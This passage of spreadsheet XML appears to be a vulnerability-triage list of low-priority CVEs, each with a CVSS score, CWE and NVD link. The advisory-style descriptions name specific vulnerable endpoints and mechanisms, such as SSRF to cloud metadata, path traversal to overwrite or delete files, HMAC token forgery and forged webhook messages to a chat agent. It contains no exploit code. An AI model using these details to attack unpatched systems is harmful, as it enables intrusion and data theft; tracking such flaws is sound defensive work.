exploitation may allow an attacker to remote query the affected endpoint that
may facilitate user enumeration and subsequent attacks targeting administrative
accounts.</t></is></c><c r="S1508" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81531</t></is></c></row><row r="1509"><c r="A1509" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1509" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1509" s="5" t="inlineStr"><is><t>CVE-2026-81823</t></is></c><c r="D1509" s="5" t="n"><v>6.9</v></c><c r="E1509" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1509" s="5" t="inlineStr"><is><t>ics-cert@hq.dhs.gov</t></is></c><c r="G1509" s="5" t="inlineStr" /><c r="H1509" s="5" t="n"><v>0.002</v></c><c r="I1509" s="5" t="inlineStr" /><c r="J1509" s="5" t="inlineStr" /><c r="K1509" s="5" t="inlineStr" /><c r="L1509" s="5" t="inlineStr" /><c r="M1509" s="5" t="inlineStr" /><c r="N1509" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1509" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1509" s="5" t="inlineStr" /><c r="Q1509" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R1509" s="5" t="inlineStr"><is><t>The vulnerability, if exploited, could allow an unauthenticated miscreant to perform read operations intended only for PIMBoards users, resulting in information disclosure. Write operations are not impacted.</t></is></c><c r="S1509" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81823</t></is></c></row><row r="1510"><c r="A1510" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1510" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1510" s="5" t="inlineStr"><is><t>CVE-2026-83492</t></is></c><c r="D1510" s="5" t="n"><v>6.9</v></c><c r="E1510" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1510" s="5" t="inlineStr"><is><t>vulnreport@tenable.com</t></is></c><c r="G1510" s="5" t="inlineStr" /><c r="H1510" s="5" t="n"><v>0.002</v></c><c r="I1510" s="5" t="inlineStr" /><c r="J1510" s="5" t="inlineStr" /><c r="K1510" s="5" t="inlineStr" /><c r="L1510" s="5" t="inlineStr" /><c r="M1510" s="5" t="inlineStr" /><c r="N1510" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1510" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P1510" s="5" t="inlineStr" /><c r="Q1510" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="R1510" s="5" t="inlineStr"><is><t>Improper input validation vulnerability in Extend Themes Kubio AI Website Builder.

This issue affects Kubio AI Website Builder: before 2.9.1.</t></is></c><c r="S1510" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83492</t></is></c></row><row r="1511"><c r="A1511" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1511" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1511" s="5" t="inlineStr"><is><t>CVE-2026-83611</t></is></c><c r="D1511" s="5" t="n"><v>6.9</v></c><c r="E1511" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1511" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1511" s="5" t="inlineStr" /><c r="H1511" s="5" t="n"><v>0.004</v></c><c r="I1511" s="5" t="inlineStr" /><c r="J1511" s="5" t="inlineStr" /><c r="K1511" s="5" t="inlineStr" /><c r="L1511" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1511" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N1511" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O1511" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P1511" s="5" t="inlineStr" /><c r="Q1511" s="5" t="inlineStr"><is><t>CWE-1286</t></is></c><c r="R1511" s="5" t="inlineStr"><is><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is></c><c r="S1511" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83611</t></is></c></row><row r="1512"><c r="A1512" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1512" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1512" s="5" t="inlineStr"><is><t>CVE-2026-84201</t></is></c><c r="D1512" s="5" t="n"><v>6.9</v></c><c r="E1512" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1512" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1512" s="5" t="inlineStr" /><c r="H1512" s="5" t="n"><v>0.001</v></c><c r="I1512" s="5" t="inlineStr" /><c r="J1512" s="5" t="inlineStr" /><c r="K1512" s="5" t="inlineStr" /><c r="L1512" s="5" t="inlineStr" /><c r="M1512" s="5" t="inlineStr" /><c r="N1512" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1512" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P1512" s="5" t="inlineStr" /><c r="Q1512" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R1512" s="5" t="inlineStr"><is><t>appium-mcp-server through 0.1.61 fails to validate or normalize file paths in the write_file and write_files_batch tools, allowing attackers to write files outside the intended PROJECT_ROOT directory. Attackers can supply absolute paths or relative paths with parent directory segments to overwrite arbitrary files with the server user's privileges, including shell profiles and configuration files in the home directory.</t></is></c><c r="S1512" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84201</t></is></c></row><row r="1513"><c r="A1513" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1513" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1513" s="5" t="inlineStr"><is><t>CVE-2026-84478</t></is></c><c r="D1513" s="5" t="n"><v>6.9</v></c><c r="E1513" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1513" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1513" s="5" t="inlineStr" /><c r="H1513" s="5" t="n"><v>0.004</v></c><c r="I1513" s="5" t="inlineStr" /><c r="J1513" s="5" t="inlineStr" /><c r="K1513" s="5" t="inlineStr" /><c r="L1513" s="5" t="inlineStr" /><c r="M1513" s="5" t="inlineStr" /><c r="N1513" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1513" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P1513" s="5" t="inlineStr" /><c r="Q1513" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="R1513" s="5" t="inlineStr"><is><t>WWBN AVideo contains a path traversal vulnerability in the API get_api_login_code endpoint that allows unauthenticated attackers to delete arbitrary .log files by supplying directory traversal sequences in the code parameter. Attackers can exploit this to destroy audit logs and probe for file existence on the server, with the vulnerability enabling both file deletion and information disclosure about the filesystem.</t></is></c><c r="S1513" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84478</t></is></c></row><row r="1514"><c r="A1514" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1514" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1514" s="5" t="inlineStr"><is><t>CVE-2026-84481</t></is></c><c r="D1514" s="5" t="n"><v>6.9</v></c><c r="E1514" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1514" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1514" s="5" t="inlineStr" /><c r="H1514" s="5" t="n"><v>0.003</v></c><c r="I1514" s="5" t="inlineStr" /><c r="J1514" s="5" t="inlineStr" /><c r="K1514" s="5" t="inlineStr" /><c r="L1514" s="5" t="inlineStr" /><c r="M1514" s="5" t="inlineStr" /><c r="N1514" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1514" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P1514" s="5" t="inlineStr" /><c r="Q1514" s="5" t="inlineStr"><is><t>CWE-200</t></is></c><c r="R1514" s="5" t="inlineStr"><is><t>WWBN AVideo through 30.0 contains an information disclosure vulnerability in the MobileManager plugin getConfiguration endpoint that returns sensitive configuration data to unauthenticated visitors. Attackers can send an unauthenticated GET request to plugin/MobileManager/getConfiguration.json.php to obtain TLS private key file paths, socket configuration details, platform version, and debug flags enabling further targeted attacks.</t></is></c><c r="S1514" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84481</t></is></c></row><row r="1515"><c r="A1515" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1515" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1515" s="5" t="inlineStr"><is><t>CVE-2026-84483</t></is></c><c r="D1515" s="5" t="n"><v>6.9</v></c><c r="E1515" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1515" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1515" s="5" t="inlineStr" /><c r="H1515" s="5" t="n"><v>0.003</v></c><c r="I1515" s="5" t="inlineStr" /><c r="J1515" s="5" t="inlineStr" /><c r="K1515" s="5" t="inlineStr" /><c r="L1515" s="5" t="inlineStr" /><c r="M1515" s="5" t="inlineStr" /><c r="N1515" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1515" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P1515" s="5" t="inlineStr" /><c r="Q1515" s="5" t="inlineStr"><is><t>CWE-321</t></is></c><c r="R1515" s="5" t="inlineStr"><is><t>WWBN AVideo through commit 9c39d8c8 contains an incomplete authentication bypass in encryptPass.json.php that allows unauthenticated attackers to compute valid HMAC tokens using the public site URL and current time. Attackers can forge authentication tokens by computing hash_hmac with the site's base URL as the key and submit arbitrary passwords to receive encrypted hashes, enabling offline precomputation attacks against stolen password databases.</t></is></c><c r="S1515" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84483</t></is></c></row><row r="1516"><c r="A1516" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1516" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C1516" s="5" t="inlineStr"><is><t>CVE-2026-85062</t></is></c><c r="D1516" s="5" t="n"><v>6.9</v></c><c r="E1516" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1516" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G1516" s="5" t="inlineStr" /><c r="H1516" s="5" t="n"><v>0.003</v></c><c r="I1516" s="5" t="inlineStr" /><c r="J1516" s="5" t="inlineStr" /><c r="K1516" s="5" t="inlineStr" /><c r="L1516" s="5" t="inlineStr"><is><t>npm:colord</t></is></c><c r="M1516" s="5" t="inlineStr"><is><t>2.9.4</t></is></c><c r="N1516" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O1516" s="5" t="inlineStr" /><c r="P1516" s="5" t="inlineStr" /><c r="Q1516" s="5" t="inlineStr"><is><t>CWE-1333</t></is></c><c r="R1516"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S1516" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85062</t></is></c></row><row r="1517"><c r="A1517" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1517" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C1517" s="5" t="inlineStr"><is><t>CVE-2026-85063</t></is></c><c r="D1517" s="5" t="n"><v>6.9</v></c><c r="E1517" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1517" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G1517" s="5" t="inlineStr" /><c r="H1517" s="5" t="n"><v>0.003</v></c><c r="I1517" s="5" t="inlineStr" /><c r="J1517" s="5" t="inlineStr" /><c r="K1517" s="5" t="inlineStr" /><c r="L1517" s="5" t="inlineStr"><is><t>npm:csv-parse</t></is></c><c r="M1517" s="5" t="inlineStr"><is><t>7.0.2</t></is></c><c r="N1517" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O1517" s="5" t="inlineStr" /><c r="P1517" s="5" t="inlineStr" /><c r="Q1517" s="5" t="inlineStr"><is><t>CWE-1321</t></is></c><c r="R1517"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S1517" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85063</t></is></c></row><row r="1518"><c r="A1518" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1518" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1518" s="5" t="inlineStr"><is><t>CVE-2026-85149</t></is></c><c r="D1518" s="5" t="n"><v>6.9</v></c><c r="E1518" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1518" s="5" t="inlineStr"><is><t>twcert@cert.org.tw</t></is></c><c r="G1518" s="5" t="inlineStr" /><c r="H1518" s="5" t="n"><v>0.002</v></c><c r="I1518" s="5" t="inlineStr" /><c r="J1518" s="5" t="inlineStr" /><c r="K1518" s="5" t="inlineStr" /><c r="L1518" s="5" t="inlineStr" /><c r="M1518" s="5" t="inlineStr" /><c r="N1518" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1518" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1518" s="5" t="inlineStr" /><c r="Q1518" s="5" t="inlineStr"><is><t>CWE-798</t></is></c><c r="R1518" s="5" t="inlineStr"><is><t>SmartIT Desktop Manager developed by Lightstar has a Use of Hard-coded Credentials vulnerability. Unauthenticated remote attackers can obtain the SFTP service credentials of the SmartIT Agent application from the source code, thereby browsing the file system of the user's host.</t></is></c><c r="S1518" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85149</t></is></c></row><row r="1519"><c r="A1519" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1519" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1519" s="5" t="inlineStr"><is><t>CVE-2026-85156</t></is></c><c r="D1519" s="5" t="n"><v>6.9</v></c><c r="E1519" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1519" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1519" s="5" t="inlineStr" /><c r="H1519" s="5" t="n"><v>0.002</v></c><c r="I1519" s="5" t="inlineStr" /><c r="J1519" s="5" t="inlineStr" /><c r="K1519" s="5" t="inlineStr" /><c r="L1519" s="5" t="inlineStr" /><c r="M1519" s="5" t="inlineStr" /><c r="N1519" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1519" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P1519" s="5" t="inlineStr" /><c r="Q1519" s="5" t="inlineStr"><is><t>CWE-200</t></is></c><c r="R1519" s="5" t="inlineStr"><is><t>WWBN AVideo fails to properly validate access controls on the public channel page, allowing unauthenticated visitors to view unlisted and group-restricted videos through hardcoded visibility flags and an undefined property. Attackers can access the channel endpoint to retrieve sensitive video content that should be hidden, including full URLs to unlisted videos and thumbnails of member-only content, regardless of the operator's hidePrivateVideos setting.</t></is></c><c r="S1519" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85156</t></is></c></row><row r="1520"><c r="A1520" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1520" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1520" s="5" t="inlineStr"><is><t>CVE-2026-85242</t></is></c><c r="D1520" s="5" t="n"><v>6.9</v></c><c r="E1520" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1520" s="5" t="inlineStr"><is><t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t></is></c><c r="G1520" s="5" t="inlineStr" /><c r="H1520" s="5" t="n"><v>0.003</v></c><c r="I1520" s="5" t="inlineStr" /><c r="J1520" s="5" t="inlineStr" /><c r="K1520" s="5" t="inlineStr" /><c r="L1520" s="5" t="inlineStr" /><c r="M1520" s="5" t="inlineStr" /><c r="N1520" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1520" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P1520" s="5" t="inlineStr" /><c r="Q1520" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R1520" s="5" t="inlineStr"><is><t>PlaywrightCapture contains a server-side request forgery (SSRF) vulnerability in its favicon retrieval functionality. When only_global_lookup is enabled, the application validates the initial favicon URL to prevent requests to localhost, loopback, or other non-public network addresses. However, redirects followed by aiohttp were not subjected to the same validation.


An attacker able to influence the content of a page processed by PlaywrightCapture could specify a publicly reachable favicon URL that responds with an HTTP redirect to a local or otherwise restricted address, such as 127.0.0.1, localhost, or an internal network service. Because aiohttp automatically followed the redirect, the resulting request could bypass the application's local-address restrictions and cause the PlaywrightCapture host to issue HTTP requests to resources that should not be externally reachable.


Depending on the services reachable from the PlaywrightCapture host and how retrieved favicon data is subsequently exposed or processed, this could be used to probe internal HTTP services or potentially obtain information from otherwise inaccessible endpoints.


The patch introduces an aiohttp request middleware that applies the existing local-URL validation to every request in the redirect chain. Requests resolving to restricted/local destinations are rejected before they are issued.</t></is></c><c r="S1520" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85242</t></is></c></row><row r="1521"><c r="A1521" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1521" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1521" s="5" t="inlineStr"><is><t>CVE-2026-85609</t></is></c><c r="D1521" s="5" t="n"><v>6.9</v></c><c r="E1521" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1521" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1521" s="5" t="inlineStr" /><c r="H1521" s="5" t="n"><v>0.003</v></c><c r="I1521" s="5" t="inlineStr" /><c r="J1521" s="5" t="inlineStr" /><c r="K1521" s="5" t="inlineStr" /><c r="L1521" s="5" t="inlineStr" /><c r="M1521" s="5" t="inlineStr" /><c r="N1521" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1521" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1521" s="5" t="inlineStr" /><c r="Q1521" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R1521" s="5" t="inlineStr"><is><t>Openpanel before 2.3.0 contains an unauthenticated full-read server-side request forgery (SSRF) vulnerability in the GET /tools/site-checker endpoint (apps/api/src/controllers/tools.controller.ts). The endpoint passes a user-supplied url query parameter to fetchWithRedirects() and performs server-side HTTP requests to arbitrary URLs without any SSRF/IP validation. An unauthenticated remote attacker can access cloud instance metadata endpoints, probe internal services, scan internal network ports, and read returned content (status code, page size, timing, and parsed HTML metadata), and leak internal IP addresses (via getIPInfo() to a third party).</t></is></c><c r="S1521" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85609</t></is></c></row><row r="1522"><c r="A1522" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1522" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1522" s="5" t="inlineStr"><is><t>CVE-2026-85621</t></is></c><c r="D1522" s="5" t="n"><v>6.9</v></c><c r="E1522" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1522" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1522" s="5" t="inlineStr" /><c r="H1522" s="5" t="n"><v>0.002</v></c><c r="I1522" s="5" t="inlineStr" /><c r="J1522" s="5" t="inlineStr" /><c r="K1522" s="5" t="inlineStr" /><c r="L1522" s="5" t="inlineStr" /><c r="M1522" s="5" t="inlineStr" /><c r="N1522" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1522" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1522" s="5" t="inlineStr" /><c r="Q1522" s="5" t="inlineStr"><is><t>CWE-345</t></is></c><c r="R1522" s="5" t="inlineStr"><is><t>LobeChat (LobeHub) 2.2.1 does not properly verify inbound chat-platform webhook signatures in the QQ and Feishu adapters. The webhook route (/api/agent/webhooks/:platform) is unauthenticated by design and delegates verification to each adapter; the QQ adapter performs no Ed25519 signature verification on dispatched message events, and the Feishu adapter only performs an optional static-token comparison that is skipped when no token is configured (the default) and is not a body signature. An unauthenticated attacker who knows the public webhook URL can POST forged inbound messages with an attacker-chosen sender identity and arbitrary text, causing the bot owner's agent to process attacker-controlled input and treat the attacker as a trusted platform sender.</t></is></c><c r="S1522" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85621</t></is></c></row><row r="1523"><c r="A1523" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1523" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1523" s="5" t="inlineStr"><is><t>CVE-2026-85662</t></is></c><c r="D1523" s="5" t="n"><v>6.9</v></c><c r="E1523" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1523" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1523" s="5" t="inlineStr" /><c r="H1523" s="5" t="n"><v>0.003</v></c><c r="I1523" s="5" t="inlineStr" /><c r="J1523" s="5" t="inlineStr" /><c r="K1523" s="5" t="inlineStr" /><c r="L1523" s="5" t="inlineStr" /><c r="M1523" s="5" t="inlineStr" /><c r="N1523" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1523" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1523" s="5" t="inlineStr" /><c r="Q1523" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R1523" s="5" t="inlineStr"><is><t>Marqo 2.26.0 contains a server-side request forgery vulnerability in the add_documents endpoint that allows unauthenticated attackers to trigger requests to arbitrary URLs by supplying malicious media field values. Attackers can exploit download_image_from_url and fetch_content_sample functions which lack destination filtering and host validation to access internal services and cloud metadata endpoints.</t></is></c><c r="S1523" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85662</t></is></c></row><row r="1524"><c r="A1524" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1524" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1524" s="5" t="inlineStr"><is><t>CVE-2026-86188</t></is></c><c r="D1524" s="5" t="n"><v>6.9</v></c><c r="E1524" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1524" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1524" s="5" t="inlineStr" /><c r="H1524" s="5" t="n"><v>0.003</v></c><c r="I1524" s="5" t="inlineStr" /><c r="J1524" s="5" t="inlineStr" /><c r="K1524" s="5" t="inlineStr" /><c r="L1524" s="5" t="inlineStr" /><c r="M1524" s="5" t="inlineStr" /><c r="N1524" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1524" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1524" s="5" t="inlineStr" /><c r="Q1524" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1524" s="5" t="inlineStr"><is><t>AVideo with YPTSocket plugin enabled contains a cross-site scripting vulnerability allowing unauthenticated attackers to execute arbitrary JavaScript in other users' browsers via the websocket callback mechanism. Attackers can send crafted socket messages with callback names resolving to global functions like avideoConfirmHTML that accept untrusted data and assign it to innerHTML, achieving script execution in the victim's origin without authentication or user interaction.</t></is></c><c r="S1524" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86188</t></is></c></row><row r="1525"><c r="A1525" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1525" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1525" s="5" t="inlineStr"><is><t>CVE-2026-86194</t></is></c><c r="D1525" s="5" t="n"><v>6.9</v></c><c r="E1525" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1525" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1525" s="5" t="inlineStr" /><c r="H1525" s="5" t="n"><v>0.003</v></c><c r="I1525" s="5" t="inlineStr" /><c r="J1525" s="5" t="inlineStr" /><c r="K1525" s="5" t="inlineStr" /><c r="L1525" s="5" t="inlineStr" /><c r="M1525" s="5" t="inlineStr" /><c r="N1525" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1525" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1525" s="5" t="inlineStr" /><c r="Q1525" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R1525" s="5" t="inlineStr"><is><t>Grav Form Plugin before 9.1.22 fails to verify page authorization when resolving forms by name across pages, allowing anonymous visitors to execute form actions defined on login-restricted or unpublished pages. Attackers can POST to any public page with a restricted form's name to trigger save, upload, email, or call actions without authentication.</t></is></c><c r="S1525" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86194</t></is></c></row><row r="1526"><c r="A1526" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1526" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1526" s="5" t="inlineStr"><is><t>CVE-2026-86206</t></is></c><c r="D1526" s="5" t="n"><v>6.9</v></c><c r="E1526" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1526" s="5" t="inlineStr"><is><t>a5532a13-c4dd-4202-bef1-e0b8f2f8d12b</t></is></c><c r="G1526" s="5" t="inlineStr" /><c r="H1526" s="5" t="n"><v>0.007</v></c><c r="I1526" s="5" t="inlineStr" /><c r="J1526" s="5" t="inlineStr" /><c r="K1526" s="5" t="inlineStr" /><c r="L1526" s="5" t="inlineStr" /><c r="M1526" s="5" t="inlineStr" /><c r="N1526" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1526" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1526" s="5" t="inlineStr" /><c r="Q1526" s="5" t="inlineStr"><is><t>CWE-791</t></is></c><c r="R1526" s="5" t="inlineStr"><is><t>A vulnerability in the N-central internal API access control filter allows unauthorised access to internal APIs. This is fixed in N-central 2026.3 HF3 and 2026.4</t></is></c><c r="S1526" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86206</t></is></c></row><row r="1527"><c r="A1527" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1527" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1527" s="5" t="inlineStr"><is><t>CVE-2026-86252</t></is></c><c r="D1527" s="5" t="n"><v>6.9</v></c><c r="E1527" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1527" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1527" s="5" t="inlineStr" /><c r="H1527" s="5" t="n"><v>0.002</v></c><c r="I1527" s="5" t="inlineStr" /><c r="J1527" s="5" t="inlineStr" /><c r="K1527" s="5" t="inlineStr" /><c r="L1527" s="5" t="inlineStr" /><c r="M1527" s="5" t="inlineStr" /><c r="N1527" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1527" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P1527" s="5" t="inlineStr" /><c r="Q1527" s="5" t="inlineStr"><is><t>CWE-74</t></is></c><c r="R1527" s="5" t="inlineStr"><is><t>h3 versions before 1.15.9 fail to sanitize carriage return characters in EventStream data and comment fields, allowing attackers to inject arbitrary SSE events by including unsanitized carriage returns. Attackers can inject event type directives, split single push calls into multiple browser-parsed events, or escape comment fields to inject data, bypassing the prior CVE fix that only addressed newline injection.</t></is></c><c r="S1527" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86252</t></is></c></row><row r="1528"><c r="A1528" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1528" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1528" s="5" t="inlineStr"><is><t>CVE-2026-86804</t></is></c><c r="D1528" s="5" t="n"><v>6.9</v></c><c r="E1528" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1528" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1528" s="5" t="inlineStr" /><c r="H1528" s="5" t="n"><v>0.004</v></c><c r="I1528" s="5" t="inlineStr" /><c r="J1528" s="5" t="inlineStr" /><c r="K1528" s="5" t="inlineStr" /><c r="L1528" s="5" t="inlineStr" /><c r="M1528" s="5" t="inlineStr" /><c r="N1528" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1528" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1528" s="5" t="inlineStr" /><c r="Q1528" s="5" t="inlineStr"><is><t>CWE-266, CWE-285</t></is></c><c r="R1528" s="5" t="inlineStr"><is><t>A vulnerability was identified in seakee CPA-Manager-Plus up to 1.11.10. This vulnerability affects the function CPAResource of the file apps/manager-server/internal/http/controller/proxy/handler.go of the component HTTP Handler. The manipulation leads to improper authorization. It is possible to initiate the attack remotely. Upgrading to version 1.11.11 is able to resolve this issue. The identifier of the patch is 842eec791377ddcbea5cd639bc065eaa4801d656. It is suggested to upgrade the affected component.</t></is></c><c r="S1528" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86804</t></is></c></row><row r="1529"><c r="A1529" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1529" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1529" s="5" t="inlineStr"><is><t>CVE-2026-86810</t></is></c><c r="D1529" s="5" 